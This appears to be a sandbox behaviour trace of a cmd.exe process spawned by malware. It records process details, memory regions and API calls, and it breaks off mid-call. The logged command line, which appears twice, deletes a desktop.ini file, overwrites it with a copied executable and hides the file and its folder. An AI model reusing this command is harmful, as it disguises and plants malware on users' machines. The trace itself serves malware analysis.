page_root = "0x7ea168c0" os_pid = "0x87c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10383 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10384 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10385 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10386 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 10387 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10388 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10389 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10390 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10391 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 10392 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10441 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10442 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10443 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10444 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 10445 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 10446 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10447 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10448 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10449 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10450 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10451 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10452 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10453 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10454 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10455 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 10456 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10457 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10458 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10459 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 10460 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 10461 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 10462 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 10463 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 10464 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Region: id = 10497 start_va = 0x13b0000 end_va = 0x167efff entry_point = 0x13b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 139 os_tid = 0x8a4 [0127.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fa54 | out: lpSystemTimeAsFileTime=0x24fa54*(dwLowDateTime=0x861ff900, dwHighDateTime=0x1d440a9)) [0127.824] GetCurrentProcessId () returned 0x87c [0127.824] GetCurrentThreadId () returned 0x8a4 [0127.824] GetTickCount () returned 0x2903d [0127.824] QueryPerformanceCounter (in: lpPerformanceCount=0x24fa4c | out: lpPerformanceCount=0x24fa4c*=18461372325) returned 1 [0127.825] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.825] __set_app_type (_Type=0x1) [0127.825] __p__fmode () returned 0x76b331f4 [0127.825] __p__commode () returned 0x76b331fc [0127.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.826] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.826] GetCurrentThreadId () returned 0x8a4 [0127.826] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8a4) returned 0x38 [0127.826] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.826] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.826] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.826] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f9e4 | out: phkResult=0x24f9e4*=0x0) returned 0x2 [0127.827] VirtualQuery (in: lpAddress=0x24fa1b, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.827] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f9b4, dwLength=0x1c | out: lpBuffer=0x24f9b4*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.827] GetConsoleOutputCP () returned 0x1b5 [0127.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.827] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.827] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.827] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.828] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.828] GetEnvironmentStringsW () returned 0x440610* [0127.828] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.828] GetEnvironmentStringsW () returned 0x440610* [0127.829] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e954 | out: phkResult=0x24e954*=0x40) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0xc0, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x0, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegCloseKey (hKey=0x40) returned 0x0 [0127.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e954 | out: phkResult=0x24e954*=0x40) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x40, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x1, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x0, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x4, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x4) returned 0x0 [0127.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e95c, lpData=0x24e960, lpcbData=0x24e958*=0x1000 | out: lpType=0x24e95c*=0x0, lpData=0x24e960*=0x9, lpcbData=0x24e958*=0x1000) returned 0x2 [0127.829] RegCloseKey (hKey=0x40) returned 0x0 [0127.830] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.830] srand (_Seed=0x5b886362) [0127.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" [0127.830] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"" [0127.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441d70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.830] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.830] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.830] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.830] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.831] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.831] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.831] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.831] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.831] GetEnvironmentStringsW () returned 0x442760* [0127.831] FreeEnvironmentStringsW (penv=0x442760) returned 1 [0127.831] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.831] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.831] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.831] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.831] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.831] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.831] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.831] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.831] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f720, lpFilePart=0x24f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f71c*="Desktop") returned 0x18 [0127.831] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.832] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f49c | out: lpFindFileData=0x24f49c) returned 0x440df0 [0127.832] FindClose (in: hFindFile=0x440df0 | out: hFindFile=0x440df0) returned 1 [0127.832] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.832] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.832] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.832] GetEnvironmentStringsW () returned 0x440610* [0127.833] FreeEnvironmentStringsW (penv=0x440610) returned 1 [0127.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.833] GetConsoleOutputCP () returned 0x1b5 [0127.833] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.833] GetUserDefaultLCID () returned 0x409 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f860, cchData=128 | out: lpLCData="0") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f860, cchData=128 | out: lpLCData="0") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f860, cchData=128 | out: lpLCData="1") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.834] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.835] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.835] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.836] GetConsoleTitleW (in: lpConsoleTitle=0x430bc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.836] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.836] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.837] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0127.837] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0127.837] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0127.837] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0127.837] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0127.837] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0127.837] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0127.840] _wcsicmp (_String1="del", _String2=")") returned 59 [0127.840] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0127.840] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0127.840] _wcsicmp (_String1="IF", _String2="del") returned 5 [0127.840] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0127.840] _wcsicmp (_String1="REM", _String2="del") returned 14 [0127.840] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0127.843] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.843] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.843] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.843] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.844] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.844] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.844] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.929] SetErrorMode (uMode=0x0) returned 0x0 [0127.929] SetErrorMode (uMode=0x1) returned 0x0 [0127.929] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x440830, lpFilePart=0x24f014 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f014*="Desktop") returned 0x18 [0127.929] SetErrorMode (uMode=0x0) returned 0x1 [0127.930] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.930] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0127.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.936] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ed90, 